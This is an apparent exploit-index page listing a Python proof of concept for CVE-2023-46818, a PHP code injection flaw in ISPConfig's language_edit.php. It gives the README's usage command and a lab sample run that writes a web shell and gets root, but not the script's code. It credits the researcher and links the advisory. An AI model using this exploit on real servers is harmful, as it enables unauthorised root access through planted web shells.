CVE-2023-46818 PoC — ISPConfig 安全漏洞

Source

Associated Vulnerability

Description

CVE-2023-46818 Python3 Exploit for ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability

Readme

# CVE-2023-46818 Python Exploit

## 🔥 Description

This Python exploit script targets a security vulnerability in ISPConfig's `records` POST parameter to `/admin/language_edit.php`, which is not properly sanitized. This allows an authenticated admin to inject and execute arbitrary PHP code.

## ⚠️ Affected Versions

Version 3.2.11 and prior versions.

## ⚙️ Usage

```python
python3 CVE-2023-46818.py <URL> <Username> <Password>
```

## 💻 Sample Run
```shell
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...

ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell#
```


## ℹ️ Reference

https://seclists.org/fulldisclosure/2023/Dec/2

## ❤️ Credits

Shout out to Egidio Romano for this discovery.

File Snapshot

 [4.0K]  /data/pocs/6aa21ca57ca3a6b82dde5540197973f4c077223f
├── [3.6K]  CVE-2023-46818.py
└── [1.2K]  README.md

0 directories, 2 files

Remarks